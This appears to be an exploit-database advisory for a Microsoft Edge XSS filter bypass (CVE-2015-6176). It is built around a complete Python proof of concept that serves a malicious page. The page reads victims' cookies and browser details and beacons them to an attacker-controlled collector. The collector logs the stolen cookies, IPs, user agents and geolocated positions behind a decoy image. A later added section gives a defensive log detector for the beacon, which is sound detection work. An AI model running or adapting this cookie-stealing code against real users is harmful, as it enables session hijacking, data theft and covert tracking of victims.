📄 Microsoft Edge Cross Site Scripting Filter Bypass

🗓️ 22 Jul 2025 00:00:00 | Reported by nu11secur1ty | Type: packetstorm | 🔗 packetstorm.news

Demonstrates Edge XSS filter bypass PoC that steals cookies and logs user data.

Related

| Reporter | Title | Published |
|---|---|---|
| Circl | CVE-2015-6176 | 23 Jul 2025 21:02 |
| CNVD | Microsoft Edge XSS Filter Bypass Vulnerability | 9 Dec 2015 00:00 |
| CVE | CVE-2015-6176 | 9 Dec 2015 11:00 |
| Cvelist | CVE-2015-6176 | 9 Dec 2015 11:00 |
| Exploit DB | Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS) | 22 Jul 2025 00:00 |
| EUVD | EUVD-2015-6119 | 7 Oct 2025 00:30 |
| Microsoft KB | MS15-125: Cumulative Security Update for Microsoft Edge: December 8, 2015 | 8 Dec 2015 00:00 |
| Kaspersky | KLA10720 Multiple vulnerabilities in Microsoft Internet Explorer & Edge | 8 Dec 2015 00:00 |
| NVD | CVE-2015-6176 | 9 Dec 2015 11:59 |
| OpenVAS | Microsoft Edge Multiple Vulnerabilities (3116184) | 5 Jan 2016 00:00 |

# Title: Microsoft Edge XSS Filter Bypass PoC
    # Author: nu11secur1ty
    # Date: 2025-07-18
    # Vendor: Microsoft
    # Software: Microsoft Edge Browser
    # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6176
    
    ## Description
    This Proof of Concept (PoC) demonstrates a bypass of the Cross-Site
    Scripting (XSS) filter in Microsoft Edge. The vulnerability allows
    attackers to inject and execute malicious JavaScript despite Edge's
    built-in XSS protection mechanisms. The PoC serves a crafted HTML page
    that reads the user's cookies and sends them to an attacker-controlled
    collector server, bypassing Edge's filter. The collector server displays
    a large sea picture as a decoy while logging the stolen cookies, IP
    addresses, user agents, timestamps, and approximate geographic locations.
    This vulnerability is categorized as medium severity because stolen
    cookies can be used for session hijacking and for performing
    unauthorized actions.
    
    
    # STATUS: MEDIUM VULNERABILITY
    
    [+]Exploit:
    ```python
    
    #!/usr/bin/python
    # nu11secur1ty CVE-2015-6176
    
    import http.server
    import socketserver
    import socket
    import threading
    from urllib import parse
    import requests
    import datetime
    
    PORT = 8080
    COLLECTOR_PORT = 9000
    
    # HTML page with extended XSS exploit that sends lots of info via Image GET to collector
    HTML_CONTENT = b"""<!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8" />
    <title>XSS Edge Bypass PoC</title>
    <script>
    window.onload = function() {
        try {
            var attackerServer = "http://{LOCAL_IP}:{COLLECTOR_PORT}/collect";
            var cookies = document.cookie || "";
            var url = window.location.href;
            var referrer = document.referrer;
            var language = navigator.language || "";
            var platform = navigator.platform || "";
            var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || "";
            var screenRes = screen.width + "x" + screen.height;
    
            var data = {
                cookie: cookies,
                url: url,
                referrer: referrer,
                language: language,
                platform: platform,
                timezone: timezone,
                screen: screenRes
            };
    
            var query = Object.keys(data).map(function(k) {
                return encodeURIComponent(k) + "=" + encodeURIComponent(data[k]);
            }).join("&");
    
            var img = new Image();
            img.src = attackerServer + "?" + query;
        } catch(e) {
            console.error("Error sending data:", e);
        }
    };
    </script>
    </head>
    <body>
    <h1 style="color:red;">XSS Edge Bypass PoC</h1>
    <p>If this alert appears, XSS is executed.</p>
    </body>
    </html>
    """
    
    # Collector page with large sea picture and centered message (Unicode allowed)
    COLLECTOR_PAGE = """<!DOCTYPE html>
    <html lang="en">
    <head>
    <meta charset="UTF-8" />
    <title>Collected</title>
    <style>
      body {
        margin: 0;
        background: url('https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80') no-repeat center center fixed;
        background-size: cover;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        color: white;
        font-family: Arial, sans-serif;
        font-size: 2em;
        text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
      }
    </style>
    </head>
    <body>
    <div>Thank you for visiting the collector page 🌊</div>
    </body>
    </html>
    """
    
    class ExploitHandler(http.server.SimpleHTTPRequestHandler):
        def do_GET(self):
            if self.path in ('/', '/index.html'):
                content = (HTML_CONTENT
                           .replace(b"{LOCAL_IP}", local_ip.encode())
                           .replace(b"{COLLECTOR_PORT}", str(COLLECTOR_PORT).encode()))
                self.send_response(200)
                self.send_header("Content-Type", "text/html; charset=utf-8")
                self.send_header("Content-Length", str(len(content)))
                self.end_headers()
                self.wfile.write(content)
            else:
                self.send_error(404)
    
    class CollectorHandler(http.server.BaseHTTPRequestHandler):
        def do_GET(self):
            parsed_path = parse.urlparse(self.path)
            if parsed_path.path == "/collect":
                query = parse.parse_qs(parsed_path.query)
    
                cookie = query.get("cookie", [""])[0]
                url = query.get("url", [""])[0]
                referrer = query.get("referrer", [""])[0]
                language = query.get("language", [""])[0]
                platform = query.get("platform", [""])[0]
                timezone = query.get("timezone", [""])[0]
                screen = query.get("screen", [""])[0]
    
                ip = self.client_address[0]
                user_agent = self.headers.get("User-Agent", "Unknown")
                timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    
                location = self.get_location(ip)
    
                if cookie:
                    print(f"[{timestamp}] [+] Collected cookie: {cookie}")
                print(f"    URL: {url}")
                print(f"    Referrer: {referrer}")
                print(f"    Language: {language}")
                print(f"    Platform: {platform}")
                print(f"    Timezone: {timezone}")
                print(f"    Screen Resolution: {screen}")
                print(f"    From IP: {ip}")
                print(f"    User-Agent: {user_agent}")
                print(f"    Location: {location}")
                print("-" * 50)
    
                # Save collected info to a file
                with open("collected_data.log", "a", encoding="utf-8") as f:
                    f.write(f"[{timestamp}] Cookie: {cookie}\n")
                    f.write(f"    URL: {url}\n")
                    f.write(f"    Referrer: {referrer}\n")
                    f.write(f"    Language: {language}\n")
                    f.write(f"    Platform: {platform}\n")
                    f.write(f"    Timezone: {timezone}\n")
                    f.write(f"    Screen Resolution: {screen}\n")
                    f.write(f"    IP: {ip}\n")
                    f.write(f"    User-Agent: {user_agent}\n")
                    f.write(f"    Location: {location}\n")
                    f.write("-" * 50 + "\n")
    
                self.send_response(200)
                self.send_header("Content-Type", "text/html; charset=utf-8")
                content = COLLECTOR_PAGE.encode('utf-8')
                self.send_header("Content-Length", str(len(content)))
                self.end_headers()
                self.wfile.write(content)
            else:
                self.send_error(404)
    
        def get_location(self, ip):
            # Use free IP info service; fallback gracefully if no internet
            try:
                resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3)
                if resp.status_code == 200:
                    data = resp.json()
                    city = data.get("city", "")
                    region = data.get("region", "")
                    country = data.get("country", "")
                    loc = data.get("loc", "")
                    return f"{city}, {region}, {country} (coords: {loc})"
            except Exception:
                pass
            return "Location lookup failed or unavailable"
    
    def get_local_ip():
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.connect(("8.8.8.8", 80))
            ip = s.getsockname()[0]
        except Exception:
            ip = "127.0.0.1"
        finally:
            s.close()
        return ip
    
    def run_exploit_server():
        with socketserver.TCPServer(("", PORT), ExploitHandler) as httpd:
            print(f"[*] Exploit server running at: http://{local_ip}:{PORT}/index.html")
            httpd.serve_forever()
    
    def run_collector_server():
        with socketserver.TCPServer(("", COLLECTOR_PORT), CollectorHandler) as httpd:
            print(f"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect")
            httpd.serve_forever()
    
    if __name__ == "__main__":
        local_ip = get_local_ip()
        try:
            print(f"[*] Your server IP is: {local_ip}")
            exploit_thread = threading.Thread(target=run_exploit_server, daemon=True)
            exploit_thread.start()
    
            run_collector_server()
        except KeyboardInterrupt:
            print("\n[!] Shutting down servers. Goodbye!")
    
    ```
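
Seen from the defender's side, the beacon the PoC page sends has a recognisable shape in proxy or access logs. The following is an added example, not part of the original advisory or the author's code: it flags cross-origin GET requests whose query string carries the PoC's parameter names. The four-column log format, the hosts in the sample lines and the threshold of four fields are assumptions made for illustration.

```python
# Added example (not from the original PoC): flag requests shaped like the
# PoC's image beacon in proxy / web access logs.
from urllib.parse import urlsplit, parse_qs

# Parameter names the PoC page puts in its beacon query string.
BEACON_FIELDS = {"cookie", "url", "referrer", "language",
                 "platform", "timezone", "screen"}

# Constructed sample log lines (assumed format): client method URL referer
SAMPLE_LOG = """\
10.0.0.5 GET http://192.0.2.10:9000/collect?cookie=sid%3Dabc123%3B%20theme%3Ddark&url=https%3A%2F%2Fapp.example%2Faccount&referrer=&language=en-US&platform=Win32&timezone=Europe%2FSofia&screen=1920x1080 https://app.example/account
10.0.0.6 GET https://cdn.example/img/logo.png?v=3 https://app.example/
10.0.0.7 GET https://analytics.example/px?screen=1366x768&language=de https://shop.example/cart
10.0.0.8 GET https://app.example/search?url=https%3A%2F%2Fapp.example%2Fhelp https://app.example/
"""

def cookie_names(value):
    """Return cookie names only, so the detector never re-logs session values."""
    return [p.split("=", 1)[0].strip() for p in value.split(";") if "=" in p]

def inspect(url, referer):
    """Return a finding dict if the request looks like the beacon, else None."""
    dest = urlsplit(url)
    params = parse_qs(dest.query, keep_blank_values=True)
    fields = sorted(BEACON_FIELDS.intersection(params))
    names = cookie_names(params.get("cookie", [""])[0])
    # The beacon leaves the page's origin; same-origin traffic is ignored.
    cross_origin = dest.hostname != urlsplit(referer).hostname
    if cross_origin and (names or len(fields) >= 4):
        return {"dest": dest.netloc, "fields": fields, "cookie_names": names}
    return None

def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or parts[1] != "GET":
            continue
        hit = inspect(parts[2], parts[3])
        if hit:
            hit["client"] = parts[0]
            findings.append(hit)
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Cookies set with the `HttpOnly` attribute are not exposed through `document.cookie`, so the `cookie` field of such a beacon would not contain them.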
    
    # Video:
    [href](https://www.youtube.com/watch?v=T2YLrFsvXOc)
    
    # Source:
    [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)
    
    
    # Time spent:
    03:35:00
